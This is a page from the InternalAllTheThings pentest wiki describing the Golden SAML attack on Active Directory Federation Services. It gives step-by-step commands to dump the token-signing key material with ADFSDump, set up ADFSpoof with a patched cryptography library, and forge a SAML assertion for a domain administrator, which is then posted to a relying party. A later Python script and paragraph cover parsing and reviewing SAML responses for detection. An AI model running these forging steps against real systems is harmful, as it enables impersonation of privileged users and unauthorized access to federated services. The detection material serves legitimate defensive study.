InternalAllTheThings/docs/active-directory/ad-adfs-federation-services.md


Active Directory - Federation Services

ADFS - Golden SAML

Requirements:

  • Code execution on the AD FS server as the AD FS service account (it is the identity that can read the configuration database and the DKM key)
  • The token-signing certificate's private key: the EncryptedPfx blob stored in the AD FS configuration database, plus the DKM key from Active Directory that decrypts it

Exploitation:

  • Run mandiant/ADFSDump on the AD FS server as the AD FS service account. It queries the Windows Internal Database (WID) over the named pipe \\.\pipe\MICROSOFT##WID\tsql\query and reads the DKM key from Active Directory. The output contains the EncryptedPfx blob (base64) and the DKM key (hex) used in the next steps.
  • Convert the EncryptedPfx blob and the DKM key to binary files (keep the file names consistent with the ADFSpoof command below; the "[...]" stands for the elided part of each value)
    # For the pfx (base64 in the ADFSDump output)
    echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin
    # For the DKM key (hex in the ADFSDump output)
    echo f7404c7f[...]aabd8b | xxd -r -p > DkmKey.bin
    
  • Create the Golden SAML using mandiant/ADFSpoof. It requires a patched fork of the cryptography library (dmb2168/cryptography), which is installed into the virtualenv in place of the upstream package; you might need to update the other dependencies.
    mkdir ADFSpoofTools
    cd $_
    git clone https://github.com/dmb2168/cryptography.git
    git clone https://github.com/mandiant/ADFSpoof.git
    python3 -m venv venvADFSSpoof
    source venvADFSSpoof/bin/activate
    pip install lxml
    pip install signxml
    pip uninstall -y cryptography
    cd cryptography
    pip install -e .
    cd ../ADFSpoof
    pip install -r requirements.txt
    python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls/SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>'
  • ADFSpoof prints the signed, base64-encoded SAMLResponse. Submit it to the relying party's endpoint (--endpoint) as the SAMLResponse field of a form POST, as a browser would after a successful AD FS sign-in. --rpidentifier is the relying party trust identifier that becomes the assertion's Audience, -s is the AD FS server name the token claims to come from, and --assertions injects the claims the relying party maps to a user.
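To see what the relying party actually receives from the command above, here is an added example (written for this page, not code from ADFSpoof or from the original author) that decodes a SAMLResponse form value and pulls out the fields a Golden SAML review cares about: Issuer, NameID and its format, Audience, the validity window, the claims, whether the response answers an AuthnRequest, and the SHA-1 thumbprint of the embedded signing certificate. The sample response is constructed to mirror the page's parameters (transient NameID PENTEST\administrator, audience Supervision, the windowsaccountname claim); the issuer URL http://adfs.pentest.lab/adfs/services/trust is assumed from the -s value, and a placeholder byte string stands in for the DER certificate. No XML signature is verified here (that needs signxml), so the check is on the certificate identity, not the signature.

```python
import base64
import hashlib
import xml.etree.ElementTree as ET

NS = {
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}
TRANSIENT = "urn:oasis:names:tc:SAML:2.0:nameid-format:transient"
WINDOWSACCOUNTNAME = "http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"

# Constructed placeholder standing in for the DER token-signing certificate
# that AD FS embeds in <ds:X509Certificate>; not a real X.509 structure.
CONSTRUCTED_CERT_DER = b"constructed placeholder, not a real certificate"

# Constructed sample of the SAMLResponse the page's ADFSpoof command would
# produce. Issuer URL is assumed from "-s adfs.pentest.lab"; the Signature
# element carries only the certificate, no real XML-DSig.
SAMPLE_RESPONSE_XML = """<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
    xmlns:ds="http://www.w3.org/2000/09/xmldsig#"
    ID="_r1" Version="2.0" IssueInstant="2024-01-01T00:00:00Z"
    Destination="https://www.contoso.com/adfs/ls/SamlResponseServlet">
  <saml:Issuer>http://adfs.pentest.lab/adfs/services/trust</saml:Issuer>
  <samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status>
  <saml:Assertion ID="_a1" Version="2.0" IssueInstant="2024-01-01T00:00:00Z">
    <saml:Issuer>http://adfs.pentest.lab/adfs/services/trust</saml:Issuer>
    <ds:Signature><ds:KeyInfo><ds:X509Data>
      <ds:X509Certificate>{cert}</ds:X509Certificate>
    </ds:X509Data></ds:KeyInfo></ds:Signature>
    <saml:Subject>
      <saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">PENTEST\\administrator</saml:NameID>
    </saml:Subject>
    <saml:Conditions NotBefore="2024-01-01T00:00:00Z" NotOnOrAfter="2024-01-01T01:00:00Z">
      <saml:AudienceRestriction><saml:Audience>Supervision</saml:Audience></saml:AudienceRestriction>
    </saml:Conditions>
    <saml:AttributeStatement>
      <saml:Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname">
        <saml:AttributeValue>PENTEST\\administrator</saml:AttributeValue>
      </saml:Attribute>
    </saml:AttributeStatement>
  </saml:Assertion>
</samlp:Response>""".format(cert=base64.b64encode(CONSTRUCTED_CERT_DER).decode())
SAMPLE_RESPONSE_B64 = base64.b64encode(SAMPLE_RESPONSE_XML.encode()).decode()


def cert_thumbprint(der: bytes) -> str:
    """SHA-1 thumbprint in the upper-case hex form the AD FS console shows."""
    return hashlib.sha1(der).hexdigest().upper()


def parse_saml_response(saml_response_b64: str) -> dict:
    """Decode a SAMLResponse form value and extract the fields relevant to a Golden SAML review."""
    root = ET.fromstring(base64.b64decode(saml_response_b64))
    assertion = root.find("saml:Assertion", NS)
    if assertion is None:
        raise ValueError("no plain Assertion in response (EncryptedAssertion is not handled here)")

    def text(node, path):
        el = node.find(path, NS)
        return el.text.strip() if el is not None and el.text else None

    nameid = assertion.find("saml:Subject/saml:NameID", NS)
    cond = assertion.find("saml:Conditions", NS)
    cert_b64 = text(assertion, ".//ds:X509Certificate")
    attrs = {}
    for a in assertion.findall("saml:AttributeStatement/saml:Attribute", NS):
        attrs[a.get("Name")] = [v.text for v in a.findall("saml:AttributeValue", NS)]
    return {
        "issuer": text(root, "saml:Issuer"),
        "in_response_to": root.get("InResponseTo"),  # absent on IdP-initiated / forged responses
        "nameid": nameid.text if nameid is not None else None,
        "nameid_format": nameid.get("Format") if nameid is not None else None,
        "audience": text(assertion, "saml:Conditions/saml:AudienceRestriction/saml:Audience"),
        "not_before": cond.get("NotBefore") if cond is not None else None,
        "not_on_or_after": cond.get("NotOnOrAfter") if cond is not None else None,
        "attributes": attrs,
        "signer_thumbprint": cert_thumbprint(base64.b64decode(cert_b64)) if cert_b64 else None,
    }


def review_response(parsed: dict, expected_issuer: str, expected_thumbprint: str) -> list:
    """Points a reviewer would flag. A token forged with the real token-signing key
    passes the thumbprint check; only a token signed with a rogue certificate fails it."""
    findings = []
    if parsed["issuer"] != expected_issuer:
        findings.append("issuer mismatch: %r" % parsed["issuer"])
    if parsed["signer_thumbprint"] != expected_thumbprint.upper():
        findings.append("signed by an unexpected certificate: %s" % parsed["signer_thumbprint"])
    if parsed["in_response_to"] is None:
        findings.append("unsolicited (IdP-initiated) response: no InResponseTo to correlate with an AuthnRequest")
    return findings


if __name__ == "__main__":
    parsed = parse_saml_response(SAMPLE_RESPONSE_B64)
    print(parsed)
    print(review_response(parsed, "http://adfs.pentest.lab/adfs/services/trust",
                          cert_thumbprint(CONSTRUCTED_CERT_DER)))
```

The caveat this makes concrete: because the attacker signs with the stolen token-signing key, a forged token is indistinguishable from a real one at the relying party, and the thumbprint check only catches tokens signed with a certificate that was never the AD FS token-signing certificate. The missing InResponseTo is a weak signal (IdP-initiated sign-on is legitimate for many relying parties); the durable tell is a token accepted by the relying party for which AD FS itself never recorded an issuance.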
    

Other interesting tools to exploit AD FS:

References